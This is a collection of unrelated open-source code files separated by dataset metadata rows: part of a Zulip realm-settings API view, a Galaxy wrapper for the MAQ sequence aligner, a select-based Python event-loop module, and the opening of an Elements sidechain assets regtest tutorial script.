),
name_changes_disabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
email_changes_disabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
avatar_changes_disabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
inline_image_preview: Optional[bool] = REQ(json_validator=check_bool, default=None),
inline_url_embed_preview: Optional[bool] = REQ(json_validator=check_bool, default=None),
add_emoji_by_admins_only: Optional[bool] = REQ(json_validator=check_bool, default=None),
allow_message_deleting: Optional[bool] = REQ(json_validator=check_bool, default=None),
message_content_delete_limit_seconds: Optional[int] = REQ(
converter=to_non_negative_int, default=None
),
allow_message_editing: Optional[bool] = REQ(json_validator=check_bool, default=None),
allow_community_topic_editing: Optional[bool] = REQ(json_validator=check_bool, default=None),
mandatory_topics: Optional[bool] = REQ(json_validator=check_bool, default=None),
message_content_edit_limit_seconds: Optional[int] = REQ(
converter=to_non_negative_int, default=None
),
allow_edit_history: Optional[bool] = REQ(json_validator=check_bool, default=None),
default_language: Optional[str] = REQ(default=None),
waiting_period_threshold: Optional[int] = REQ(converter=to_non_negative_int, default=None),
authentication_methods: Optional[Dict[str, Any]] = REQ(
json_validator=check_dict([]), default=None
),
notifications_stream_id: Optional[int] = REQ(json_validator=check_int, default=None),
signup_notifications_stream_id: Optional[int] = REQ(json_validator=check_int, default=None),
message_retention_days_raw: Optional[Union[int, str]] = REQ(
"message_retention_days", json_validator=check_string_or_int, default=None
),
send_welcome_emails: Optional[bool] = REQ(json_validator=check_bool, default=None),
digest_emails_enabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
message_content_allowed_in_email_notifications: Optional[bool] = REQ(
json_validator=check_bool, default=None
),
bot_creation_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.BOT_CREATION_POLICY_TYPES), default=None
),
create_stream_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
invite_to_stream_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
move_messages_between_streams_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
user_group_edit_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.USER_GROUP_EDIT_POLICY_TYPES), default=None
),
private_message_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.PRIVATE_MESSAGE_POLICY_TYPES), default=None
),
wildcard_mention_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.WILDCARD_MENTION_POLICY_TYPES), default=None
),
email_address_visibility: Optional[int] = REQ(
json_validator=check_int_in(Realm.EMAIL_ADDRESS_VISIBILITY_TYPES), default=None
),
default_twenty_four_hour_time: Optional[bool] = REQ(json_validator=check_bool, default=None),
video_chat_provider: Optional[int] = REQ(json_validator=check_int, default=None),
giphy_rating: Optional[int] = REQ(json_validator=check_int, default=None),
default_code_block_language: Optional[str] = REQ(default=None),
digest_weekday: Optional[int] = REQ(
json_validator=check_int_in(Realm.DIGEST_WEEKDAY_VALUES), default=None
),
) -> HttpResponse:
realm = user_profile.realm
# Additional validation/error checking beyond types go here, so
# the entire request can succeed or fail atomically.
if default_language is not None and default_language not in get_available_language_codes():
raise JsonableError(_("Invalid language '{}'").format(default_language))
if authentication_methods is not None:
if not user_profile.is_realm_owner:
raise OrganizationOwnerRequired()
if True not in list(authentication_methods.values()):
return json_error(_("At least one authentication method must be enabled."))
if video_chat_provider is not None and video_chat_provider not in {
p["id"] for p in Realm.VIDEO_CHAT_PROVIDERS.values()
}:
return json_error(_("Invalid video_chat_provider {}").format(video_chat_provider))
if giphy_rating is not None and giphy_rating not in {
p["id"] for p in Realm.GIPHY_RATING_OPTIONS.values()
}:
return json_error(_("Invalid giphy_rating {}").format(giphy_rating))
message_retention_days: Optional[int] = None
if message_retention_days_raw is not None:
if not user_profile.is_realm_owner:
raise OrganizationOwnerRequired()
realm.ensure_not_on_limited_plan()
message_retention_days = parse_message_retention_days(
message_retention_days_raw, Realm.MESSAGE_RETENTION_SPECIAL_VALUES_MAP
)
# The user of `locals()` here is a bit of a code smell, but it's
# restricted to the elements present in realm.property_types.
#
# TODO: It should be possible to deduplicate this function up
# further by some more advanced usage of the
# `REQ/has_request_variables` extraction.
req_vars = {k: v for k, v in list(locals().items()) if k in realm.property_types}
data: Dict[str, Any] = {}
for k, v in list(req_vars.items()):
if v is not None and getattr(realm, k) != v:
do_set_realm_property(realm, k, v, acting_user=user_profile)
if isinstance(v, str):
data[k] = "updated"
else:
data[k] = v
# The following realm properties do not fit the pattern above
# authentication_methods is not supported by the do_set_realm_property
# framework because of its bitfield.
if authentication_methods is not None and (
realm.authentication_methods_dict() != authentication_methods
):
do_set_realm_authentication_methods(realm, authentication_methods, acting_user=user_profile)
data["authentication_methods"] = authentication_methods
# The message_editing settings are coupled to each other, and thus don't fit
# into the do_set_realm_property framework.
if (
(allow_message_editing is not None and realm.allow_message_editing != allow_message_editing)
or (
message_content_edit_limit_seconds is not None
and realm.message_content_edit_limit_seconds != message_content_edit_limit_seconds
)
or (
allow_community_topic_editing is not None
and realm.allow_community_topic_editing != allow_community_topic_editing
)
):
if allow_message_editing is None:
allow_message_editing = realm.allow_message_editing
if message_content_edit_limit_seconds is None:
message_content_edit_limit_seconds = realm.message_content_edit_limit_seconds
if allow_community_topic_editing is None:
allow_community_topic_editing = realm.allow_community_topic_editing
do_set_realm_message_editing(
realm,
allow_message_editing,
message_content_edit_limit_seconds,
allow_community_topic_editing,
acting_user=user_profile,
)
data["allow_message_editing"] = allow_message_editing
data["message_content_edit_limit_seconds"] = message_content_edit_limit_seconds
data["allow_community_topic_editing"] = allow_community_topic_editing
# Realm.notifications_stream and Realm.signup_notifications_stream are not boolean,
# str or integer field, and thus doesn't fit into the do_set_realm_property framework.
if notifications_stream_id is not None:
if realm.notifications_stream is None or (
realm.notifications_stream.id != notifications_stream_id
):
new_notifications_stream = None
if notifications_stream_id >= 0:
(new_notifications_stream, sub) = access_stream_by_id(
user_profile, notifications_stream_id
)
do_set_realm_notifications_stream(
realm, new_notifications_stream, notifications_stream_id, acting_user=user_profile
)
data["notifications_stream_id"] = notifications_stream_id
if signup_notifications_stream_id is not None:
if realm.signup_notifications_stream is None or (
realm.signup_notifications_stream.id != signup_notifications_stream_id
):
new_signup_notifications_stream = None
if signup_notifications_stream_id >= 0:
(new_signup_notifications_stream, sub) = access_stream_by_id(
user_profile, signup_notifications_stream_id
)
do_set_realm_signup_notifications_stream(
realm,
new_signup_notifications_stream,
signup_notifications_stream_id,
acting_user=user_profile,
)
data["signup_notifications_stream_id"] = signup_notifications_stream_id
if default_code_block_language is not None:
# Migrate '', used in the API to encode the default/None behavior of this feature.
if default_code_block_language == "":
data["default_code_block_language"] = None
else:
data["default_code_block_language"] = default_code_block_language
return json_success(data)
@require_realm_owner
@has_request_variables
def deactivate_realm(request: HttpRequest, user: UserProfile) -> HttpResponse:
realm = user.realm
do_deactivate_realm(realm, acting_user=user)
return json_success()
@require_safe
def check_subdomain_available(request: HttpRequest, subdomain: str) -> HttpResponse:
try:
check_subdomain(subdomain)
return json_success({"msg": "available"})
except ValidationError as e:
return json_success({"msg": e.message})
def realm_reactivation(request: HttpRequest, confirmation_key: str) -> HttpResponse:
try:
realm = get_object_from_key(confirmation_key, Confirmation.REALM_REACTIVATION)
except ConfirmationKeyException:
return render(request, "zerver/realm_reactivation_link_error.html")
do_reactivate_realm(realm)
context = {"realm": realm}
return render(request, "zerver/realm_reactivation.html", context)
|
apache-2.0
| -8,273,240,410,386,260,000
| 46.18315
| 100
| 0.68799
| false
| 3.795227
| false
| false
| false
|
volpino/Yeps-EURAC
|
tools/solid_tools/maq_cs_wrapper.py
|
1
|
12127
|
#! /usr/bin/python
#Guruprasad Ananda
#MAQ mapper for SOLiD colourspace-reads
import sys, os, zipfile, tempfile, subprocess
def stop_err( msg ):
sys.stderr.write( "%s\n" % msg )
sys.exit()
def __main__():
out_fname = sys.argv[1].strip()
out_f2 = open(sys.argv[2].strip(),'r+')
ref_fname = sys.argv[3].strip()
f3_read_fname = sys.argv[4].strip()
f3_qual_fname = sys.argv[5].strip()
paired = sys.argv[6]
if paired == 'yes':
r3_read_fname = sys.argv[7].strip()
r3_qual_fname = sys.argv[8].strip()
min_mapqual = int(sys.argv[9].strip())
max_mismatch = int(sys.argv[10].strip())
out_f3name = sys.argv[11].strip()
subprocess_dict = {}
ref_csfa = tempfile.NamedTemporaryFile()
ref_bfa = tempfile.NamedTemporaryFile()
ref_csbfa = tempfile.NamedTemporaryFile()
cmd2_1 = 'maq fasta2csfa %s > %s 2>&1' %(ref_fname,ref_csfa.name)
cmd2_2 = 'maq fasta2bfa %s %s 2>&1' %(ref_csfa.name,ref_csbfa.name)
cmd2_3 = 'maq fasta2bfa %s %s 2>&1' %(ref_fname,ref_bfa.name)
try:
os.system(cmd2_1)
os.system(cmd2_2)
os.system(cmd2_3)
except Exception, erf:
stop_err(str(erf)+"Error processing reference sequence")
if paired == 'yes': #paired end reads
tmpf = tempfile.NamedTemporaryFile() #forward reads
tmpr = tempfile.NamedTemporaryFile() #reverse reads
tmps = tempfile.NamedTemporaryFile() #single reads
tmpffastq = tempfile.NamedTemporaryFile()
tmprfastq = tempfile.NamedTemporaryFile()
tmpsfastq = tempfile.NamedTemporaryFile()
cmd1 = "solid2fastq_modified.pl 'yes' %s %s %s %s %s %s %s 2>&1" %(tmpf.name,tmpr.name,tmps.name,f3_read_fname,f3_qual_fname,r3_read_fname,r3_qual_fname)
try:
os.system(cmd1)
os.system('gunzip -c %s >> %s' %(tmpf.name,tmpffastq.name))
os.system('gunzip -c %s >> %s' %(tmpr.name,tmprfastq.name))
os.system('gunzip -c %s >> %s' %(tmps.name,tmpsfastq.name))
except Exception, eq:
stop_err("Error converting data to fastq format." + str(eq))
#make a temp directory where the split fastq files will be stored
try:
split_dir = tempfile.mkdtemp()
split_file_prefix_f = tempfile.mktemp(dir=split_dir)
split_file_prefix_r = tempfile.mktemp(dir=split_dir)
splitcmd_f = 'split -a 2 -l %d %s %s' %(32000000,tmpffastq.name,split_file_prefix_f) #32M lines correspond to 8M reads
splitcmd_r = 'split -a 2 -l %d %s %s' %(32000000,tmprfastq.name,split_file_prefix_r) #32M lines correspond to 8M reads
os.system(splitcmd_f)
os.system(splitcmd_r)
os.chdir(split_dir)
ii = 0
for fastq in os.listdir(split_dir):
if not fastq.startswith(split_file_prefix_f.split("/")[-1]):
continue
fastq_r = split_file_prefix_r + fastq.split(split_file_prefix_f.split("/")[-1])[1] #find the reverse strand fastq corresponding to formward strand fastq
tmpbfq_f = tempfile.NamedTemporaryFile()
tmpbfq_r = tempfile.NamedTemporaryFile()
cmd3 = 'maq fastq2bfq %s %s 2>&1; maq fastq2bfq %s %s 2>&1; maq map -c %s.csmap %s %s %s 1>/dev/null 2>&1; maq mapview %s.csmap > %s.txt' %(fastq,tmpbfq_f.name,fastq_r,tmpbfq_r.name,fastq,ref_csbfa.name,tmpbfq_f.name,tmpbfq_r.name,fastq,fastq)
subprocess_dict['sp'+str(ii+1)] = subprocess.Popen([cmd3],shell=True,stdout=subprocess.PIPE)
ii += 1
while True:
all_done = True
for j,k in enumerate(subprocess_dict.keys()):
if subprocess_dict['sp'+str(j+1)].wait() != 0:
err = subprocess_dict['sp'+str(j+1)].communicate()[1]
if err != None:
stop_err("Mapping error: %s" %err)
all_done = False
if all_done:
break
cmdout = "for map in *.txt; do cat $map >> %s; done" %(out_fname)
os.system(cmdout)
tmpcsmap = tempfile.NamedTemporaryFile()
cmd_cat_csmap = "for csmap in *.csmap; do cat $csmap >> %s; done" %(tmpcsmap.name)
os.system(cmd_cat_csmap)
tmppileup = tempfile.NamedTemporaryFile()
cmdpileup = "maq pileup -m %s -q %s %s %s > %s" %(max_mismatch,min_mapqual,ref_bfa.name,tmpcsmap.name,tmppileup.name)
os.system(cmdpileup)
tmppileup.seek(0)
print >> out_f2, "#chr\tposition\tref_nt\tcoverage\tSNP_count\tA_count\tT_count\tG_count\tC_count"
for line in file(tmppileup.name):
elems = line.strip().split()
ref_nt = elems[2].capitalize()
read_nt = elems[4]
coverage = int(elems[3])
a,t,g,c = 0,0,0,0
ref_nt_count = 0
for ch in read_nt:
ch = ch.capitalize()
if ch not in ['A','T','G','C',',','.']:
continue
if ch in [',','.']:
ch = ref_nt
ref_nt_count += 1
try:
nt_ind = ['A','T','G','C'].index(ch)
if nt_ind == 0:
a+=1
elif nt_ind == 1:
t+=1
elif nt_ind == 2:
g+=1
else:
c+=1
except ValueError, we:
print >>sys.stderr, we
print >> out_f2, "%s\t%s\t%s\t%s\t%s\t%s" %("\t".join(elems[:4]),coverage-ref_nt_count,a,t,g,c)
except Exception, er2:
stop_err("Encountered error while mapping: %s" %(str(er2)))
else: #single end reads
tmpf = tempfile.NamedTemporaryFile()
tmpfastq = tempfile.NamedTemporaryFile()
cmd1 = "solid2fastq_modified.pl 'no' %s %s %s %s %s %s %s 2>&1" %(tmpf.name,None,None,f3_read_fname,f3_qual_fname,None,None)
try:
os.system(cmd1)
os.system('gunzip -c %s >> %s' %(tmpf.name,tmpfastq.name))
tmpf.close()
except:
stop_err("Error converting data to fastq format.")
#make a temp directory where the split fastq files will be stored
try:
split_dir = tempfile.mkdtemp()
split_file_prefix = tempfile.mktemp(dir=split_dir)
splitcmd = 'split -a 2 -l %d %s %s' %(32000000,tmpfastq.name,split_file_prefix) #32M lines correspond to 8M reads
os.system(splitcmd)
os.chdir(split_dir)
for i,fastq in enumerate(os.listdir(split_dir)):
tmpbfq = tempfile.NamedTemporaryFile()
cmd3 = 'maq fastq2bfq %s %s 2>&1; maq map -c %s.csmap %s %s 1>/dev/null 2>&1; maq mapview %s.csmap > %s.txt' %(fastq,tmpbfq.name,fastq,ref_csbfa.name,tmpbfq.name,fastq,fastq)
subprocess_dict['sp'+str(i+1)] = subprocess.Popen([cmd3],shell=True,stdout=subprocess.PIPE)
while True:
all_done = True
for j,k in enumerate(subprocess_dict.keys()):
if subprocess_dict['sp'+str(j+1)].wait() != 0:
err = subprocess_dict['sp'+str(j+1)].communicate()[1]
if err != None:
stop_err("Mapping error: %s" %err)
all_done = False
if all_done:
break
cmdout = "for map in *.txt; do cat $map >> %s; done" %(out_fname)
os.system(cmdout)
tmpcsmap = tempfile.NamedTemporaryFile()
cmd_cat_csmap = "for csmap in *.csmap; do cat $csmap >> %s; done" %(tmpcsmap.name)
os.system(cmd_cat_csmap)
tmppileup = tempfile.NamedTemporaryFile()
cmdpileup = "maq pileup -m %s -q %s %s %s > %s" %(max_mismatch,min_mapqual,ref_bfa.name,tmpcsmap.name,tmppileup.name)
os.system(cmdpileup)
tmppileup.seek(0)
print >> out_f2, "#chr\tposition\tref_nt\tcoverage\tSNP_count\tA_count\tT_count\tG_count\tC_count"
for line in file(tmppileup.name):
elems = line.strip().split()
ref_nt = elems[2].capitalize()
read_nt = elems[4]
coverage = int(elems[3])
a,t,g,c = 0,0,0,0
ref_nt_count = 0
for ch in read_nt:
ch = ch.capitalize()
if ch not in ['A','T','G','C',',','.']:
continue
if ch in [',','.']:
ch = ref_nt
ref_nt_count += 1
try:
nt_ind = ['A','T','G','C'].index(ch)
if nt_ind == 0:
a+=1
elif nt_ind == 1:
t+=1
elif nt_ind == 2:
g+=1
else:
c+=1
except:
pass
print >> out_f2, "%s\t%s\t%s\t%s\t%s\t%s" %("\t".join(elems[:4]),coverage-ref_nt_count,a,t,g,c)
except Exception, er2:
stop_err("Encountered error while mapping: %s" %(str(er2)))
#Build custom track from pileup
chr_list=[]
out_f2.seek(0)
fcov = tempfile.NamedTemporaryFile()
fout_a = tempfile.NamedTemporaryFile()
fout_t = tempfile.NamedTemporaryFile()
fout_g = tempfile.NamedTemporaryFile()
fout_c = tempfile.NamedTemporaryFile()
fcov.write('''track type=wiggle_0 name="Coverage track" description="Coverage track (from Galaxy)" color=0,0,0 visibility=2\n''')
fout_a.write('''track type=wiggle_0 name="Track A" description="Track A (from Galaxy)" color=255,0,0 visibility=2\n''')
fout_t.write('''track type=wiggle_0 name="Track T" description="Track T (from Galaxy)" color=0,255,0 visibility=2\n''')
fout_g.write('''track type=wiggle_0 name="Track G" description="Track G (from Galaxy)" color=0,0,255 visibility=2\n''')
fout_c.write('''track type=wiggle_0 name="Track C" description="Track C (from Galaxy)" color=255,0,255 visibility=2\n''')
for line in out_f2:
if line.startswith("#"):
continue
elems = line.split()
chr = elems[0]
if chr not in chr_list:
chr_list.append(chr)
if not (chr.startswith('chr') or chr.startswith('scaffold')):
chr = 'chr'
header = "variableStep chrom=%s" %(chr)
fcov.write("%s\n" %(header))
fout_a.write("%s\n" %(header))
fout_t.write("%s\n" %(header))
fout_g.write("%s\n" %(header))
fout_c.write("%s\n" %(header))
try:
pos = int(elems[1])
cov = int(elems[3])
a = int(elems[5])
t = int(elems[6])
g = int(elems[7])
c = int(elems[8])
except:
continue
fcov.write("%s\t%s\n" %(pos,cov))
try:
a_freq = a*100./cov
t_freq = t*100./cov
g_freq = g*100./cov
c_freq = c*100./cov
except ZeroDivisionError:
a_freq=t_freq=g_freq=c_freq=0
fout_a.write("%s\t%s\n" %(pos,a_freq))
fout_t.write("%s\t%s\n" %(pos,t_freq))
fout_g.write("%s\t%s\n" %(pos,g_freq))
fout_c.write("%s\t%s\n" %(pos,c_freq))
fcov.seek(0)
fout_a.seek(0)
fout_g.seek(0)
fout_t.seek(0)
fout_c.seek(0)
os.system("cat %s %s %s %s %s | cat > %s" %(fcov.name,fout_a.name,fout_t.name,fout_g.name,fout_c.name,out_f3name))
if __name__=="__main__":
__main__()
|
mit
| 8,546,402,300,464,318,000
| 43.914815
| 259
| 0.504247
| false
| 3.394067
| false
| false
| false
|
SimonSapin/snippets
|
event_loop/event_loop.py
|
1
|
11983
|
"""
If an application needs to wait for various events and polling is not
possible or desirable, one solution is to use a blocking threads for each
events. However, multi-threading comes with its pitfalls and problems.
This event loop is a framework that allows an application to wait for
various events without using threads. Currently supported events are
files being ready for reading and timers (repeating or not).
The heart of the loop is basically `select.select()` with a well-chosen
timeout.
See http://exyr.org/2011/event-loop/
Author: Simon Sapin
License: BSD
"""
import sys
import os
import time
import itertools
import select
import decimal
# float('inf') is only officially supported form Python 2.6, while decimal
# is there since 2.4.
Infinity = decimal.Decimal('Infinity')
class Timer(object):
"""
Create a new timer.
If it's `run()` method is called often enough, `callback` will be called
(without parameters) `interval` seconds from now (may be a floating point
number) and, if `repeat` is true, every `interval` seconds after that.
There is no thread or other form of preemption: the callback won't be
called if `run()` is not.
A repeating timers may miss a few beats if `run()` is not called for more
than one interval but is still scheduled for whole numbers of interval
after is was created or reset. See the tests for examples
"""
@classmethod
def decorate(cls, *args, **kwargs):
"""
Decorator factory:
@Timer.decorate(1, repeat=True)
def every_second():
# ...
The decorated function is replaced by the Timer object so you can
write eg.
every_second.cancel()
"""
def decorator(callback):
return cls(callback, *args, **kwargs)
return decorator
def __init__(self, callback, interval, repeat=False,
_time_function=time.time):
# `_time_function` is meant as a dependency injection for testing.
assert interval > 0
self._callback = callback
self._interval = interval
self._repeat = repeat
self._now = _time_function
self.reset()
def reset(self):
"""
Cancel currently scheduled expiry and start again as if the timer
was created just now.
"""
self._expiry = self._now() + self._interval
def cancel(self):
"""Cancel the timer. The same timer object should not be used again."""
self._expiry = None
def __call__(self):
"""Decorated callbacks can still be called at any time."""
self._callback()
def run(self):
"""
Return whether the timer will trigger again. (Repeating or not expired
yet.)
"""
if self._expiry is None:
return False
if self._now() < self._expiry:
return True
if self._repeat:
# Would have expired that many times since last run().
times = (self._now() - self._expiry) // self._interval + 1
self._expiry += times * self._interval
else:
self._expiry = None
# Leave a chance to the callback to call `reset()`.
self()
return self._expiry is not None
def sleep_time(self):
"""
Return the amount of time before `run()` does anything, or
Decimal('Infinity') for a canceled or expired non-repeating timer.
"""
if self._expiry is None:
return Infinity
else:
return max(self._expiry - self._now(), 0)
class TimerManager(object):
"""
TimerManager handle multiple timers.
Not thread-safe, but the point is to avoid threads anyway.
"""
def __init__(self, _time_function=time.time):
"""
`_time_function` is meant as a dependency injection for testing.
"""
self._timers = []
self._time_function = _time_function
def add_timer(self, timeout, callback, repeat=False):
"""
Add a timer with `callback`, expiring `timeout` seconds from now and,
if `repeat` is true, every `timeout` seconds after that.
"""
timer = Timer(callback, timeout, repeat=repeat,
_time_function= self._time_function)
self._timers.append(timer)
return timer
def run(self):
"""
Call without arguments the callback of every expired timer.
Each callback is called at most once, even if a repeating timer
expired several times since last time `run()` was called.
"""
# Run all timers and remove those who won't trigger again.
self._timers = [timer for timer in self._timers if timer.run()]
def sleep_time(self):
"""
How much time you can wait before `run()` does something.
Return None if no timer is registered.
"""
return min(itertools.chain(
# Have at least one element. min() raises on empty sequences.
[Infinity],
(timer.sleep_time() for timer in self._timers)
))
class EventLoop(object):
"""
Manage callback functions to be called on certain events.
Currently supported events are:
* Timers (same as TimerManager)
* File descriptors ready for reading. (Waited for using `select.select()`)
"""
def __init__(self):
self._timers = TimerManager()
self._readers = {}
def add_timer(self, timeout, repeat=False):
"""
Decorator factory for adding a timer:
@loop.add_timer(1)
def one_second_from_now():
# callback code
"""
def decorator(callback):
return self._timers.add_timer(timeout, callback, repeat)
return decorator
def watch_for_reading(self, file_descriptor):
"""
Decorator factory for watching a file descriptor. When the file
descriptor is ready for reading, it is passed as a paramater to
the decorated callback.
Takes either a file descriptor (integer) or a file object with a
`fileno()` method that returns one.
@loop.watch_for_reading(sys.stdin)
def one_second_from_now():
data = os.read(sys.stdin.fileno(), 255)
# ...
Use `os.read()` instead of `some_file.read()` to read just what is
available and avoid blocking, without the file actually being in
non-blocking mode.
"""
if not isinstance(file_descriptor, (int, long)):
file_descriptor = file_descriptor.fileno()
def decorator(callback):
self._readers[file_descriptor] = callback
return callback
return decorator
def block_reader(self, file_descriptor, max_block_size=8 * 1024):
"""
Decorator factory. As soon as some data is available for reading on
the file descriptor, the decorated callback is called with a block
of up to `max_block_size` bytes.
If data comes slowly, blocks will be smaller than max_block_size and
contain just what can be read without blocking. In that case, the value
of max_block_size does not matter.
"""
def decorator(callback):
@self.watch_for_reading(file_descriptor)
def reader(fd):
# According to `select.select()` there is some data,
# so os.read() won't block.
data = os.read(fd, max_block_size)
callback(data)
return callback
return decorator
def push_back_reader(self, file_descriptor, max_block_size=8 * 1024):
"""
Just like block_reader, but allow you to push data "back into tho file".
Callbacks get a `push_back` function as a second parameter. You can
push back the data you don't want to use yet.
Example use case: you get some data in a block, but you need more
before it is useful or meaningful. You can push it back instead of
keeping track of it yourself.
On the next call, the data you pushed back will be prepended to the
next block, in the order it was pushed.
"""
def decorator(callback):
pushed_back = []
@self.block_reader(file_descriptor, max_block_size)
def reader(data):
if pushed_back:
pushed_back.append(data)
data = ''.join(pushed_back)
pushed_back[:] = []
callback(data, pushed_back.append)
return callback
return decorator
def line_reader(self, file_descriptor, max_block_size=8 * 1024):
r"""
Decorator factory. The decorated callback is called once with
every line (terminated by '\n') as they become available.
Just like with `some_file.readline()`, the trailing newline character
is included.
The `max_block_size` paramater is just passed to `block_reader()`.
"""
# line_reader could be implemeted with push_back_reader, but not doing
# so allow us to only search new data for the newline chararcter.
def decorator(callback):
partial_line_fragments = []
@self.block_reader(file_descriptor, max_block_size)
def reader(data):
# Loop since there could be more than one line in one block.
while 1:
try:
end = data.index('\n')
except ValueError:
# no newline here
break
else:
end += 1 # include the newline char
partial_line_fragments.append(data[:end])
line = ''.join(partial_line_fragments)
partial_line_fragments[:] = []
callback(line)
data = data[end:]
if data:
partial_line_fragments.append(data)
return callback
return decorator
def run(self):
"""
Run the event loop. Wait for events, call callbacks when events happen,
and only return when the `stop()` is called.
"""
self._running = True
while self._running:
timeout = self._timers.sleep_time()
if timeout == Infinity:
timeout = None
if self._readers:
ready, _, _ = select.select(
self._readers.keys(), [], [], timeout)
else:
assert timeout is not None, 'Running without any event'
# Some systems do not like 3 empty lists for select()
time.sleep(timeout)
ready = []
self._timers.run()
for fd in ready:
self._readers[fd](fd)
def stop(self):
"""
Signal the event loop to stop before doing another iteration.
Since the point of the event loop is to avoid threads, this will
probably be called from an event callback.
"""
self._running = False
if __name__ == '__main__':
loop = EventLoop()
@loop.add_timer(5, repeat=True)
def timeout():
print 'No new line in 5 seconds. Stopping now.'
loop.stop()
@loop.line_reader(sys.stdin)
def new_line(line):
timeout.reset()
print 'Echo:', line.strip()
print 'Echoing lines.'
loop.run()
print 'Exit.'
|
bsd-3-clause
| -3,009,963,854,136,994,300
| 33.632948
| 80
| 0.562881
| false
| 4.717717
| false
| false
| false
|
ElementsProject/elements
|
contrib/assets_tutorial/assets_tutorial.py
|
1
|
17042
|
#!/usr/bin/env python3
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
import os
import random
import sys
import time
import subprocess
import shutil
from decimal import Decimal
ELEMENTSPATH=""
BITCOINPATH=""
if len(sys.argv) == 2:
ELEMENTSPATH=sys.argv[0]
BITCOINPATH=sys.argv[1]
else:
ELEMENTSPATH="./src"
BITCOINPATH="./../bitcoin/src"
def startbitcoind(datadir, conf, args=""):
subprocess.Popen((BITCOINPATH+"/bitcoind -datadir="+datadir+" "+args).split(), stdout=subprocess.PIPE)
return AuthServiceProxy("http://"+conf["rpcuser"]+":"+conf["rpcpassword"]+"@127.0.0.1:"+conf["regtest.rpcport"])
def startelementsd(datadir, conf, args=""):
subprocess.Popen((ELEMENTSPATH+"/elementsd -datadir="+datadir+" "+args).split(), stdout=subprocess.PIPE)
return AuthServiceProxy("http://"+conf["rpcuser"]+":"+conf["rpcpassword"]+"@127.0.0.1:"+conf["elementsregtest.rpcport"])
def loadConfig(filename):
conf = {}
with open(filename, encoding="utf8") as f:
for line in f:
if len(line) == 0 or line[0] == "#" or len(line.split("=")) != 2:
continue
conf[line.split("=")[0]] = line.split("=")[1].strip()
conf["filename"] = filename
return conf
def sync_all(e1, e2):
totalWait = 10
while e1.getblockcount() != e2.getblockcount() or len(e1.getrawmempool()) != len(e2.getrawmempool()):
totalWait -= 1
if totalWait == 0:
raise Exception("Nodes cannot sync blocks or mempool!")
time.sleep(1)
return
# Preparations
# Make data directories for each daemon
b_datadir="/tmp/"+''.join(random.choice('0123456789ABCDEF') for i in range(5))
e1_datadir="/tmp/"+''.join(random.choice('0123456789ABCDEF') for i in range(5))
e2_datadir="/tmp/"+''.join(random.choice('0123456789ABCDEF') for i in range(5))
os.makedirs(b_datadir)
os.makedirs(e1_datadir)
os.makedirs(e2_datadir)
print("Bitcoin datadir: "+b_datadir)
print("Elements1 datadir: "+e1_datadir)
print("Elements2 datadir: "+e2_datadir)
# Also configure the nodes by copying the configuration files from
# this directory (and read them back for arguments):
shutil.copyfile("contrib/assets_tutorial/bitcoin.conf", b_datadir+"/bitcoin.conf")
shutil.copyfile("contrib/assets_tutorial/elements1.conf", e1_datadir+"/elements.conf")
shutil.copyfile("contrib/assets_tutorial/elements2.conf", e2_datadir+"/elements.conf")
bconf = loadConfig("contrib/assets_tutorial/bitcoin.conf")
e1conf = loadConfig("contrib/assets_tutorial/elements1.conf")
e2conf = loadConfig("contrib/assets_tutorial/elements2.conf")
# Startup
# Can not start since bitcoind isn't running and validatepegin is set
# elementsd attempts to connect to bitcoind to check if peg-in transactions
# are confirmed in the Bitcoin chain.
e1 = startelementsd(e1_datadir, e1conf)
time.sleep(2)
try:
e1.getinfo()
raise AssertionError("This should fail unless working bitcoind can be reached via JSON RPC")
except:
pass
# Start bitcoind, then elementsd. As long as bitcoind is in RPC warmup, elementsd will connect
bitcoin = startbitcoind(b_datadir, bconf)
e1 = startelementsd(e1_datadir, e1conf)
e2 = startelementsd(e2_datadir, e2conf)
time.sleep(3)
# Alternatively, you can set validatepegin=0 in their configs and not
# run the bitcoin node, but it is necessary for fully validating the two way peg.
# Regtest chain starts with 21M bitcoins as OP_TRUE which the wallet
# understands. This is useful for testing basic functionality and for
# blockchains that have no pegging functionality. A fee currency is required
# for anti-DoS purposes as well as asset issuance, which consumes inputs for entropy.
# In Elements there is no block subsidy. In a production sidechain it can
# be configured to start with no outputs, necessitating peg-in functionality
# for asset issuance.
e1.getwalletinfo()
# In regtest mining "target" is OP_TRUE since we have not set `-signblockscript` argument
# Generate simply works.
e1.generatetoaddress(101, e1.getnewaddress())
sync_all(e1, e2)
# WALLET
# First, send all anyone-can-spend coins to e1 then split so balances are even
e1.sendtoaddress(e1.getnewaddress(), 21000000, "", "", True)
e1.generatetoaddress(101, e1.getnewaddress())
sync_all(e1, e2)
e1.sendtoaddress(e2.getnewaddress(), 10500000, "", "", False)
e1.generatetoaddress(101, e1.getnewaddress())
sync_all(e1, e2)
# Funds should now be evenly split between the two wallets
e1.getwalletinfo()
e2.getwalletinfo()
# Have e2 send coins to themself using a blinded Elements address
# Blinded addresses start with `CTE`, unblinded `2`
addr = e2.getnewaddress()
# How do we know it's blinded? Check for blinding key, unblinded address.
e2.getaddressinfo(addr)
# Basic blinded send
txid = e2.sendtoaddress(addr, 1)
e2.generatetoaddress(1, e1.getnewaddress())
sync_all(e1, e2)
# Now let's examine the transaction, both in wallet and without
# In-wallet, take a look at blinding information
e2.gettransaction(txid)
# e1 doesn't have in wallet since it's unrelated
try:
e1.gettransaction(txid)
raise Exception("Transaction should not be in wallet")
except JSONRPCException:
pass
# Get public info, see blinded ranges, etc
e1.getrawtransaction(txid, 1)
# Now let's private import the key to attempt a spend
e1.importprivkey(e2.dumpprivkey(addr))
# We can't see output value info though
# and can not send.
e1.gettransaction(txid)
# And it won't show in balance or known outputs
e1.getwalletinfo()
# Amount for transaction is unknown, so it is not shown in listunspent.
e1.listunspent(1, 1)
# Solution: Import blinding key
e1.importblindingkey(addr, e2.dumpblindingkey(addr))
# Check again, funds should show
